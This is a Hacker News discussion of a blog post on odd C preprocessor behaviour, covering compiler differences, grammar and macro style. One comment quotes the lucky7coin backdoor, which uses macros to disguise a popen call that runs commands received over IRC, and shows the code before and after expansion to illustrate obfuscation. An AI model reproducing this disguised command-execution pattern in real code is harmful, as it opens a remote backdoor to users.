
Scandalous Weird Old Things About the C Preprocessor - robertelder
http://blog.robertelder.org/7-weird-old-things-about-the-c-preprocessor/
======
pjc50
The C preprocessor is a horrendous way of doing metaprogramming that was
implemented because it was relatively easy to do as a separate pass. There's a
reason why very few other languages have done it this way.

A good knowledge of the preprocessor is essential for writing obfuscated and
underhanded C. For example, the lucky7coin backdoor:
[https://github.com/alerj78/lucky7coin/issues/1](https://github.com/alerj78/lucky7coin/issues/1)
where the code

    
    
      if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
      {
        CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    

expands to

    
    
      if (vWords[1] == "PR" "IV" "M" "SG" && vWords[3] == ":!" && vWords[0].size() > 1)
      {
        FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");

~~~
DSMan195276
IMO, whether or not the C preprocessor is good depends on what you're trying
to do and how you do it. I doubt there are any preprocessors or macro systems
that can't be used to obfuscate code - That's basically the definition of what
they do, modify your code before you compile it. Obviously, and
strange/unexplained preprocessor usage should be examined and preferably
removed.

The example you gave is not really fair though, because it seems pretty
obvious to me that nobody ever looked at that code - it hardly matters they
hid the backdoor in the the C pre-processor. If you take a look at the repo,
it only has three commits - With the first one
([https://github.com/alerj78/lucky7coin/commit/07d7e5fc53e5673...](https://github.com/alerj78/lucky7coin/commit/07d7e5fc53e56736643a73d8a13ff4f74c118b3b))
being a supposed import of the code from the repo it used to exist in, and
it's in this commit where the backdoor was inserted. The real issue is that
people were running code from someone who appears to be a complete unknown,
has no history for his code, and just assumed it was the same as the old code
without checking.

~~~
mrbrowning
Preprocessors are uniquely problematic in this regard, though, since they're
just simple text-substitution engines. Things like templating (as in C++), in-
language macros (as in Lisp variants), or language-level metaprogramming
facilities (as in Ruby, Python, ...) all have access to actual entities in the
language, which constrains their effects in a way that's safer and easier to
reason about.

~~~
DSMan195276
I'm not looking to deny that straight text-substitution has it's drawbacks,
you're completely right. But that being said, I still don't see it as big of a
deal as it seems. Generally speaking, bad/malicious pre-processor abuse like
this sticks out like a sore thumb when you're reviewing code. If you don't
have anybody reviewing the code then it doesn't really matter how you
disguised it. At least with the C preprocessor, if there's something you're
unsure about, you can run the preprocessor separately and look at the output,
clearing up all doubt over what it does.

Also worth noting, one of the nicer things about the design of the C
preprocessor is that it can be applied to a lot of different file-types. In
more complicated low-level C projects, you can run the preprocessor over your
C code, assembly code, linker scripts, etc.. which is a huge gain since you
can have access to all your constants and simple macros, simplifying work and
duplication. You can't get that with something tied to the language - Which is
unfortunate, because like you said it's better to avoid the preprocessor,
since writing things on the language-level makes them much easier to reason
about.)

------
evmar
Here's one I recently learned about:

[http://reviews.llvm.org/D15866](http://reviews.llvm.org/D15866)

    
    
        #define FOO
        #define BAR defined(FOO)
        #if BAR
        ...
        #else
        ...
        #endif
    

clang and gcc will pick the #if branch while Visual Studio will take the #else
branch.

~~~
nkurz
This doesn't seem quite right. Did you maybe mean "#undefine FOO" or "!
defined(FOO)"? Whether BAR gets expanded or not, in your example it looks like
it would always evaluate true. Or am I misunderstanding the ambiguity?

It might be telling that I also don't understand the Clang bug report as
written. I think there are typos in the examples. Is the switch from
"HAVE_FOO_BAR" to "HAVE_FOO" in the first example intentional? Is the
construct "#defined" (with a final 'd') intentional in the second?

~~~
evmar
I'm not sure -- I'm going off what the Clang bug says. They have a spec ref in
there. (Note that you can't trust your intuition on how compilers work, you
can only trust the spec and experiments.)

If it helps any here is the real-world code where this problem came up:

[https://codereview.chromium.org/1584203002/](https://codereview.chromium.org/1584203002/)

Edit: another reference:
[https://gcc.gnu.org/onlinedocs/cpp/Defined.html#Defined](https://gcc.gnu.org/onlinedocs/cpp/Defined.html#Defined)
"If the defined operator appears as a result of a macro expansion, the C
standard says the behavior is undefined."

~~~
nkurz
OK, I've now tested. For this test code:

    
    
      #define FOO
      #define BAR defined(FOO)
      #if BAR
      #error "true"
      #else
      #error "false"
      #endif
    

Clang, GCC, and ICC evaluate the "true" branch, while MSVC evaluates the
"false" branch.

For the same test code with first line changed to "undef":

    
    
      #undef FOO
      #define BAR defined(FOO)
      #if BAR
      #error "true"
      #else
      #error "false"
      #endif
    

MSVC, Clang, GCC, and ICC all agree on "false".

Importantly, though, when used with "/Wall", MSVC gives this error message in
both cases:

    
    
      main.cpp(3): warning C4668: 'definedFOO' is not defined as
         a preprocessor macro, replacing with '0' for '#if/#elif'
    

None of the other three compilers give any warnings even with '-Wall -Wextra
-pedantic". So there definitely is a difference in behavior, but I don't think
it's actually the one that's presumed in that bug.

For further experimentation, Clang, GCC, and ICC can be tested online here:
[http://gcc.godbolt.org/](http://gcc.godbolt.org/)

And MSVC can be tested online here:
[http://webcompiler.cloudapp.net/](http://webcompiler.cloudapp.net/)

~~~
bla2
According to the link posted by evmar, clang warns on this starting at
r258128.

------
colanderman
#2 is incorrect. Being sensitive to line breaks does not make a grammar
context-sensitive. It just means you have to treat line breaks as tokens
rather than ignorable whitespace (which is exactly what the context-free
grammar given in the C11 standard does).

Same with the bit about concatenating tokens. Every single one of those
examples has a static parse tree, which, for the C _preprocessor_ , is a
sequence of tokens and directives. The author seems to be confusing the
preprocessor's parse tree with the effect it has on the underlying text.

(Yes, the _output_ of the preprocessor is dependent on what you define, but
that has nothing to do with the _grammar_. What the author claims is like
saying a Lisp is context-sensitive because the factorial function produces a
different values for different inputs!)

Now, if you could do _this_ :

    
    
        #define foobar define
        #foobar x 123
        x
    

and get "123", _that_ would be a context-sensitive grammar. But that is NOT a
thing you can do!

------
breadbox
I hate to say it, but I was rather unimpressed by this list, and nothing in it
surprised me. While I certainly agree that the C preprocessor is a relic, and
has not weathered the test of time well, I would suggest that a number of the
supposed infelicities mentioned in this article stem from the misleading idea
that the preprocessor is an integral part of the C language proper, when it is
better thought of as its own language (and one that was traditionally done by
a completely separate program). The preprocessor does things differently than
the rest of C, because it's not C. It is a text-processing language of
convenience, provided specifically for doing things that C itself cannot (or
should not) do.

~~~
robertelder
I'll try harder next time.

------
TazeTSchnitzel
Relatedly, C is a purely functional programming language:

[http://conal.net/blog/posts/the-c-language-is-purely-
functio...](http://conal.net/blog/posts/the-c-language-is-purely-functional)

------
pklausler
I've written a C preprocessor and I agree that the language standard documents
are ambiguous and incomplete. The best I could do was hack on it until it
matched GCC's preprocessor well enough to compile Linux.

I don't recall all the horrid details, but one case that I do remember driving
me nuts was the use of #if/#endif in the argument to a function-like macro.

------
DubiousPusher
Has there been any notion of a replacement Meta/Macro language for C?
Something open source. Of course pre-preprocessing one's files and the
complexity that might add to the build system are unattractive but I'd still
be interested if someone has attacked this problem.

~~~
ctstover
My school of thought would be to limit it to just #include, #if, #else, #end,
and non-recursive single word only #define / #undef. Force everything to be 1
per single line, and call it a day.

Macros should always be the absolute last resort to doing anything. Stepping
through code in gdb with some "creative" macro-based API is almost as bad as
C++.

~~~
ArkyBeagle
I've seen 'C' macros used to do template-ey things that probably reinforced
the readability of the code ( once you get used to the fact that the macros
were there at all ) .

More modern compilers allow using non-static "const" constructs to do much of
the same, which is a great improvement.

To wit:

#define in_bounds(lower,x,upper) ((x <upper) && (x >lower))

vs. const bool in_bounds = ((x > lower) && ( x < upper ));

Macros can be used effectively for reduction in strength, so long as you're
not too clever about it.

------
cyphar
I'm 95% sure the last example in #3 is undefined behaviour. #(a b c) is not
valid, so evaluating it with multiple levels of indirection probably is a
compiler bug for not erroring out.

~~~
cyphar
And the last 3 or 4 are odd, but are required for some of the hacks required
in the early days of C (and some are almost certainly used in the Linux kernel
source today).

------
biot
Kind of click-baity, no? Though the title is missing "You won't believe what
happens next... developers hate it!"

